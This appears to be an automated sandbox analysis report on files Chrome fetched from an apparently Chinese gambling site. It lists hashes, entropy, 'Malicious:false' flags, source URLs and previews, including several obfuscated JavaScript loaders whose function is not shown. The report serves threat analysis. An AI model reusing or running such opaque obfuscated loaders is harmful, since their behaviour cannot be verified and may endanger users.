                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgTgDYBdAGgG8AiAagCYakqAuAMwFc0YAXAS3UzcyIMmgCU1dkhAACJNwBOvHlQDcANygKZCgLxpMVACJIArAAUqYsr32GALAQCOALyuYAhAAYxqhZgUAOnMyKgBlRV40AHMqSihuNk4efgNuCQUQbnYFNBleQQALXiQydIBfcrFy0JoAYQBZAhYOLj4BIRFxSWk5SJUNLR07YzNLa1sDKhRuUyYxT1xrFF1sEkCogBMQAA8AeVYyKF0PDxQAMnPcAHo8da3dg8xcMgBaHwAeLz8A4JoggBiACpMFAAD5gjxTABy0IUbgWKDE1ioAEEFAooABPOIUB77VhJNqpQQZLI5PJQAD8KECUAgEAANliiiUjgpouwALYgNDcJBiCFeZgFbjFUpCLScnl8pB3apVGq0ACiAGZmkSUh1hKIJNxArsICgFPyTlMwgAOOiM9ytLUGMnZXIyADsHl0ezAACsQDxAttWFEQOYFCgICATSyKEqoLjollNe0HRRMk68i7KmI6Yrag1uDQWskk4Idd0qFJZPIlANNNo9FMTBYrDYRi7ogANLzNlZTPYuACSTmbxymLr2uHmZCQIwwhQAElYfkFzP9AgAlUIhlBckogXGBtBQRnMxMk9IUWsyEC6KCs0q8YKhnfSCG0rfPkDWNC6Kh2pNUXRdG4LFwxQVgZG4PxyWdMUSkCMVeUwNAqT/ElulTCk5EwERuEwZF4MKRDUIER1MLQRVmCEZDiIMdDoLyJBsLKPCswQgwaLwigxVDYAZHI6pKIVapagALQaBBC2JbUugkS960MRk9jQCTfH1Q1jVNDjOl1PFWACUkyHUFBeE2GQvEA3RPwwmDVCQYBeG4GBCiQiQYCgXpcGYay8g4ui0wgwI3OPJjxHKVQ3N6OgvPomRfLIBRSJgwKj0ZEL4uqcL3NkVVov8uKFBsRK8n1ILUq6eLCsqbzYqLEkioC+k
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):19634
                                                                                                                                                          Entropy (8bit):7.963184945669312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:GQmYc2gqyEc+Ya0YgdNnx6g5LVW7DZ6/VUlOz0ouU0If1H9MwVlJyFR3ZqmeFliO:GQmYYqdc175dVx6gU7oZ7df1H9M5dFe3
                                                                                                                                                          MD5:1D8F3EE8FF9C810124A834D133E23195
                                                                                                                                                          SHA1:FC6D0D17A984C58E60CB1E7490FD8C730A972197
                                                                                                                                                          SHA-256:620E1BDF3C26704F4070CEED466065CFE6AE105D64F8EA11F1E619F1980E8BC6
                                                                                                                                                          SHA-512:CB8C7FBBF43568AD0FFC76B7CBB831CAFEED921B7DC3ED80960C7524B5DFA504F50E51588602EB84A4BBBABBD0A4ABFCA9608CB7374F929E400161B6BFBC8837
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/video/dg_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BDA0C9878D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BDA0C9868D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24
                                                                                                                                                          Entropy (8bit):4.1887218755408675
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:uuKln:uu4n
                                                                                                                                                          MD5:356555E64410CB07748C013C7862421C
                                                                                                                                                          SHA1:9FC2E0D7B2297CAB2DD4824D42BB20AF8CE1B6FE
                                                                                                                                                          SHA-256:9BF353A4E2B515DA809F62D31F61F5FD659AB8FFA04E1AC7A3304F2B05510748
                                                                                                                                                          SHA-512:0A14AE03555EBA744339B7632B8F5D382F60232499BC4D773D88DBDB7E3FAEAB7CC2815477EF59A68D500E648F977ECB68EA03D9DC9CB88FAD7201F2876D9A7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:....(empty-777).
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1123
                                                                                                                                                          Entropy (8bit):5.493713337336767
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:YvZLFLJxw8R5RWorwilPEIuhF7i+xRH9/pHBLgIugTIRgeRB/Krfjj:Yv1FLJxwewo9BGNhLgPNgsKz
                                                                                                                                                          MD5:D01102906EF6E32E787C27616CA415E3
                                                                                                                                                          SHA1:A5B7E8CEBC290634EAE62FAADB5FEBD98C85F085
                                                                                                                                                          SHA-256:7D79BCB4E392A105BB7031DCB3BC6FB4EC802B2B235326B66911C150EDC99E23
                                                                                                                                                          SHA-512:97E0997BCFFAD961ADB1407F3B8A78CBD1623E904F7A3F47ACFADB1B98C1ED9D4F7F6163E1FA442491615059C53C067227EF16D338CDD8A5382CC218D4AC65AA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi-lc.tingmeikj.com/zb-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&terminal=1&r=6412591773
                                                                                                                                                          Preview:{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', 'c0f51ba154f1c0d141fccf42aa8b5791');","domainType":1,"snType":1,"agentCode":"","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"ll12","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{},"httpsEnabled":0,"loginBg":null,"webPath":"t4091","httpsSupport":0,"analyticsJs":"","loginLogo":null,"name":".......","onlineCustomerServiceUrl":"https://hg2.jxxh8.icu/chatlink.html","preventPageFlag":1,"currencyCode":"CNY","icon":"/fileupload/ll12/202312/202312180557505.png","snStatus":1,"webTitle":"....","isMaintain":0,"i
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2512
                                                                                                                                                          Entropy (8bit):7.547261058828228
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:LfvnLjICSoeJ30/Tig/dTZZSOgtccu7xREDTZOgSCowZY8:7ttDpdTZZSOgx3ROYo+
                                                                                                                                                          MD5:D0CEBB4596A195AAD7B0D47FC32EE5B4
                                                                                                                                                          SHA1:2BA742DB28E5F3D275E6F2DD1C96275750783654
                                                                                                                                                          SHA-256:8B23BA96DCBF5054BF01C6CC039744FB08592B6E7B512F90B1E9B1563349E11C
                                                                                                                                                          SHA-512:486BCD64AE980946CD262F38FCD5A01CFA378A0189F2194EE628D632CCFF0D5B17DAEF38DE45DFCAF5E1A69D0C9443033C7467BAA99B59D31E1F66324340BEC6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/fish_more.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:ea94d59f-af8e-3b40-82cf-f343901f80d7" xmpMM:DocumentID="xmp.did:DE4AC9E48A0211EAB490EB87565D1558" xmpMM:InstanceID="xmp.iid:DE4AC9E38A0211EAB490EB87565D1558" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e7422b71-c2aa-3348-b380-7d3beb233e4f" stRef:documentID="xmp.did:ea94d59f-af8e-3b40-82cf-f343901f80d7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx.WilTU.=.v.N.i;X...5.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (760), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):760
                                                                                                                                                          Entropy (8bit):5.710786358990766
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:4chWvnTeh+TJzRicmXZStxj9Xz9cudnPmvRoOBCXoI+huRluN6rL3kSjq31JhWkG:VGaMficcMxj9Xz9c6nPaTBmMhuGNqLUg
                                                                                                                                                          MD5:1981D35BBD195A80CB7E031D80873C13
                                                                                                                                                          SHA1:382F0AB8C43D027A4F99933929022231461863D8
                                                                                                                                                          SHA-256:B98599E45C89EA6DEC465E44CD5DE8BA09EB0382DEEFF76B6D450D1A49CD62DC
                                                                                                                                                          SHA-512:E7968FCCD69A15A659B96B0A2FE5507C469FA5C2E93D889C01594E2EB1C1132E153761CD7B3F514A8380BDCF95BA4FAEBD974FD9AA6B3E5FB8AE83EB27411FA7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/components/iconSvg.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgGYBdAGgG8AiARgDcANANkoC4AzAVzRgBcBLdJh6kQpJAEoqHJCAAESHgCc+vSgG4A8mABWIXgDoAJiDZ80IAAqKUEEIp4BPTKMoB9VyCQBZFIY4AbEEoKWih/DhAWAEIABgBfcTUAZSUzAHNSACEUFECoNDVQxVk0AF5yNCgAW0jKFXQAWiRaNOCIawgkFnJ6tABhfygkLvJHWxYU5TQMxRAARw4+WcNo+NJrHigeSNGHcezckHzSYzYoAJ5o6ji40hgUKogObZWe+7QAOWrIzm5+QUksx4HEUaEoAGJeg1KABqHgACz4SH0vQGQyQN1uUHKszQxkU7C4vAEaEwkiKsh4pQRSP0ABIYLMtiAAKKBGpoYQgamI5GuGT+Nj6VwwAA+op4aiBILQshAmDqwXIMEGwxYlH8KB4PAavVksJpyNRqoxpGw8sozVaFAUWxUaLVlpauvewRV6O6G2ZLEN+i92yx2sUIzYKBg0igYEC6rO/hkwUoUGUUAaiMMxjB6qUEUoNzNFukQQoWyUI0oAA9/GY4Cx4bM2Kxfb0vjUbuJiO3xLdbfwYAAlEB4uwAMTQXWwxDihSTsj4pSQCoAagBVAD0AA5KOJMGhSFBSFFqKRfsTBDxJAvKHBlwBFJJb26UQxbFO0BoAFnXhHwUHXMQAnMEaABP4iQgEYJjnP4VJ8PoIDlhAKD2Ka153oSfwkkIIiSG2ahAA")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 334 x 81
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6877
                                                                                                                                                          Entropy (8bit):7.85531454509594
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:Qci73p5ZrMWO8WMBpPxY4dH3SxxnAafM6XIwuW:Qnjp5ZrMWO8tBhx3H3u4QPuW
                                                                                                                                                          MD5:5335A00A7D332D1E4DF3075BC889062F
                                                                                                                                                          SHA1:002E7D07D3DCC3563E0805A34BACECE0EC3B9884
                                                                                                                                                          SHA-256:7F654EA8280ABF720EC75248BBF90C9F5F4B750501F0800A361DED2344BD742C
                                                                                                                                                          SHA-512:3E5C2F1F8BC071B9570A28C2B377FBC2A7A60BAF459F1C71053485E84CC5DD9A2C09F4E12CCD7E4DEAD7FBBC5CEAB29EF1CF752ADC3401ECEBC85439B8CF8024
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89aN.Q....j..R...4..klRA.i.E%...8.D..W.n...n.zR..M......hiT9.a.N1..jD..]A.`E3.sdyd,.......P2...jgG.......U9%Y>(e:..T......M/.jS%vdL..MtW.H*..0R4 ..x.t6^C0.3......C$.|kRbH5eM+..x....dJ8.....fL9...iO>pZ).x....i..f.....G.l.......\.z+F'......;..c.S.3..8.~:...z`.....x.q\9W;'r^G.A..L.h.K,..k8..h\D$..c.T.[.jjj}L..4..Q3...T8#.]._C..E.jP.G(..p [5.V2..t.S7...[>+..y.m+.q.......l.V:'..}.v...~..y..#..f.*..x...[nUC.iTgM;....3T^<....^<.\?-....c...uP...Q0....^..}haJ8...L-.U/.nXGW>...V<%l@.N6 F-.P8.O-.S7"DDD.....................Dj..kD..j.jDD.DDDD.jj..3..D......DjDDj.jjDj.....j......jj.j....jD.j.......Djj...D.............`H$......'.......{................qM#W4......f...t.....jj..\*...K*......j..jWCD....j....l.X<(G'.......P8%D$....!.......,....N.Q.....]..H......*\....#J.H....3jD.J.. C..I....=.\...0cFT)...8s....@.B.)...HW.M.....B.J.jP..Zi....`..K..X.h.2..J..n.....'..h../(.(&t..b..."....G...2.\...G. @...L.3.F....M:4#..6;...2..2
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2009
                                                                                                                                                          Entropy (8bit):6.617757417786492
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:x/6/zNnwknA9Wp8qeJscJ3n3eyHFVQap3Wy2gXCZJ:xSBwknmWp8kUHFVj3Wy2g2
                                                                                                                                                          MD5:3AB9C471DDC68A6A6D13CA8D04D15B42
                                                                                                                                                          SHA1:4DD57AFF9FA84FDFC5EED735B61DCBE0115EFD3C
                                                                                                                                                          SHA-256:BB92B724EEC41E39F0ECAD0BA9DD41FA1BD1294A67918EC5ECD80FAA5E25DF02
                                                                                                                                                          SHA-512:6288B33D6851AAF6BB06287B42932A53BEA34475F30465D1B364655B58D9321FBBBC1E877B87BE36DF30B2938BD86BE359675DE764C40CC6061B5F5484EAACBE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR..............w=.....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmp:CreateDate="2023-07-19T12:07:20+08:00" xmp:ModifyDate="2023-07-24T11:26:32+08:00" xmp:MetadataDate="2023-07-24T11:26:32+08:00" xmpMM:InstanceID="xmp.iid:86eddd11-50b6-4276-93fe-3fd48dead353" xmpMM:DocumentID="xmp.did:E484106DF3A011E7B7B8ED81F9295C83" xmpMM:OriginalDocumentID="xmp.did:E484
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 334x81, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):51903
                                                                                                                                                          Entropy (8bit):7.9823966822535715
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:vBUxnMpjuvOeqGdk+amBNMfQDVRsCEQMMEi:W1MpKHtdk+amByQDVRsCEQMi
                                                                                                                                                          MD5:9B07C91249EC2BB5EE64D023FB5B37F4
                                                                                                                                                          SHA1:ADFB859D2D0B4AEC25B187485690EFE11D80E47F
                                                                                                                                                          SHA-256:D478AD9153D362B78171A7D91E2F6BC22B66B65642DBAD867269C49380D6DF91
                                                                                                                                                          SHA-512:B6C39A30AA2A913C8073385E90000FA93A63575B0273BFC56BA5654D3AF753D988145000726A243D3016FBCF334B91673A40715E6EAC9602968BC74C92722D44
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/e0c3a46eddb28a1d16d6d07cc16467fe.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......d......Adobe.d.................................................................................................................................................Q.N.........................................................................................................!"1#..2.Tv..8A.u.7w..x.9Qa..r.$t.5UY3s4.%.&6.'..........................!.....1A"Q2..a.#q.Br.....R.3$4t.6V9..Cs.5u..7w8b..S..U.vW.....DT..............?..W..........p......q.k..K..._.....3.@I..^>tr*...#......( '.d.0...oaK.e..i..!..#..T....(..N..>...B.C.a.\..w.[gn...Vww$G.H5ye`.T]F..I*..@.f......%\..}2... .d../..0..NECL..(....U..PL."l..\f.oN...s1.TeI.):.#7.0S.......'??{`......&..h`..`e.Y.C<..:k.?Z...V.Ln..,qz.x.\/C...8./C...8.f....+..5.Oz..l[..1.....c.$.c.w=.....>....1N...n.TP.l*.@...2[.._..g..o.1..[.v.].h+%....z8...+.....Q.j....._Gsh^.q...^R.......K.z.....M~'.......v4......L..._...&.m....t$-Z..v".......h[......_..*'pd......c.#h.@...~.O....C.../......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3496), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3496
                                                                                                                                                          Entropy (8bit):5.916580014587443
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:Vv875iNo6UgfgySU6ab8YjpBzFdhByBtdlQpDeB8yMkb:Vv872ojgfgFU6C8YjpBzFdktGahMkb
                                                                                                                                                          MD5:D052EC5C620206804FDD83CB1466A124
                                                                                                                                                          SHA1:78F7608265C6D6272367B2DADC86ECBD2E7CAFF4
                                                                                                                                                          SHA-256:AC72AA09B88727297882B4715F68598BB6798E68D0AD3BE1FCE439ED6576D5A4
                                                                                                                                                          SHA-512:FF66B38258996AE941A1068E53494FB3616A7C8ECE5B7DEBC168A5EB0E783749209C25E463505101F312972D97C727772292E1622742142C742B1748DE69FE7F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/msgBox.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAZgBYBdAGgG8AiQgagBEBPSgLgDMBXNGAFwEt1M3UiFJIAlFXZIQAAiTcATrx6UA3AHkwAKxA8AdABMQrXmhAAFBSgggF3BphGUA+s5BIAsigPsANiEoKADcoX3YQZgBCAAYAXzFVEIUZNABeJExKCAAxAE0Ac0oxUih0vTRMNGLedMy6A1xgItIUMoreYt9aygA5XIAPdWaYbrp2AHoAJmaFbuiYCFZmg1TMFEwxTHJY0k0dHkxfPQBbKAgPdm4oPnRxLeluDyR85hg9AHF4imgFaQBhOg9czXAAWbE4PH4FW4EgUIG47AUaBkCkMxigfm4egAqnwjj9/oDgdwQYIxDsDCg/r4UNJwVwbhUJCTeEg9A8nvktsdngBlEEoYBRACMpDQKAASiBjqYDMwWWzxVKZWgDKQefkAELeBjMNB+XxfBXlSXS2WpSLCnZXMD+ACCvl4+TQAAkoKr/Ap6ZCBBIACSZPQkkAAWhg6G4IDQ3CKehMqsyNv8se4KDtCgUUAcYjjKAUAFFYKSOAyoWTyEkZCBUgGYaJUiA9NdFJlQk60EVVJQYFHIwpKKl0gB+RswJAZSinBT5UyBSjRGQY1NFZiUfysGODpAjvRjidTmdoENKfIgmOkShLlArygns8D9IAMkfo/HmQPphD6/Pl8u1/J5KkLa7pwHaAAqUAvCWPrQrC8KIsiWJwhAviwCAmDjAAPFAMjjPkpAAOTYTIVzTvCqQuMBaBwJQMgEeSXzrJs2y7NoujcIcJxnO88J9nc2CTnyApNBeGpgbw3DJqJzzagYTDSfkdDXAECnUlA45zkgwkADLGNwPQgMASDaayP4QNY7A5KhhTEMU5D5PCnKybq0GMhsFZQMk3CpMaGrOaovCsJkKBsSog5QBsgggqyJwyTqYjPr5cVyXo/hoPkJIAHzRM+gg+dFbJ+Tq2BJVqOrZNZxC7hGvbFMafpmP
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):316994
                                                                                                                                                          Entropy (8bit):5.349542251999496
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:fn1klIkhkKbGUXb+/X5K4qzyutwTw8PG4NYhvUQHoXO0H0BWVPMbj:fnuhhkZy+cYutwE8PG4GOQIF0BWVPU
                                                                                                                                                          MD5:27E34DE2F2296D64B3F5BF4FFCA0E4AA
                                                                                                                                                          SHA1:947C048AD208F8C9962470E6664B0D383A2D6694
                                                                                                                                                          SHA-256:41F75723A62FF6132D037855E2AA24A033224327EB266DB175E87F07020D2678
                                                                                                                                                          SHA-512:DC994D4040277FC76F6D21656E893211A5BAA0CBEC7B1D2295184E8A26401C49A99418F5FA44FDF040FF2E903FFD3470D9573C5FF07C65F4B2855D131EAC0875
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/public/vendor.dll.js
                                                                                                                                                          Preview:var vendor_library=function(t){function e(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,e),i.l=!0,i.exports}var n={};return e.m=t,e.c=n,e.d=function(t,n,r){e.o(t,n)||Object.defineProperty(t,n,{configurable:!1,enumerable:!0,get:r})},e.n=function(t){var n=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(n,"a",n),n},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="",e(e.s=9)}([function(t,e,n){"use strict";function r(t){return"[object Array]"===O.call(t)}function i(t){return"[object ArrayBuffer]"===O.call(t)}function o(t){return"undefined"!=typeof FormData&&t instanceof FormData}function a(t){return"undefined"!=typeof ArrayBuffer&&ArrayBuffer.isView?ArrayBuffer.isView(t):t&&t.buffer&&t.buffer instanceof ArrayBuffer}function u(t){return"string"==typeof t}function s(t){return"number"==typeof t}function c(t){return void 0===t}function l(t){return null!==t&&"object"==typeof t}function f
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 20 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1215
                                                                                                                                                          Entropy (8bit):6.608499131420182
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:2cy1he91Wwjx82lY2T3ouVDix4LyJ3VGE33JbGISUL1CgMrg92SLNVhM:zwqQNn2xeJ3pBNLLMk92SZVK
                                                                                                                                                          MD5:773E54B2F28126B703DB0C06B5C9AA8C
                                                                                                                                                          SHA1:98CA1D1F5047BBD53B3A0BA19A4D7B879A41A5C3
                                                                                                                                                          SHA-256:7A55CC563D83993FFE115E7D88478067DE0B4C7DBC34D6438F931FBB448771D7
                                                                                                                                                          SHA-512:8ED68F3409421F6982E2C4DD514CA9852AFE869860B0093B8AB0FE5001179A40C5C686479ADC2AFD9F697366475A7110C2B8DFAB7E533DDCAD34BA457F61ABBC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR..............._.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:35D82634F4DA11E6B853A75CCB293192" xmpMM:DocumentID="xmp.did:35D82635F4DA11E6B853A75CCB293192"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:35D82632F4DA11E6B853A75CCB293192" stRef:documentID="xmp.did:35D82633F4DA11E6B853A75CCB293192"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..@....3IDATx.b...?.........L..M,@...X.8..4...b.b.....! ....[.....\B.Z....0.*...[.8.Im....bY&.. .....$..?@...]@......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 2481
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):808
                                                                                                                                                          Entropy (8bit):7.747604150802558
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:X0yR/5FR3vL097imTFKuPnt5fXgUy5ZMpTg:X0QFxvyPTF954UEZMpTg
                                                                                                                                                          MD5:E0D8F1FCC392EC41020548FA0262F0C8
                                                                                                                                                          SHA1:1E3352811AC8805E9F16A6998AFDD60B5A8F44B9
                                                                                                                                                          SHA-256:3185298168A57268AA370975E9DAB3EC553ACA0081C40EDBD28E56FB26982F42
                                                                                                                                                          SHA-512:97541B57853EA9A498EDA116EB724AA96E0E18571EE62272F2C16C3D7776265B49832BC5862E8AFBF0E18DFDB4F0897F932E556F4D1966C086684ADC2B870CE9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/js/gamebox/components/selectPure.js?v=1717580749344
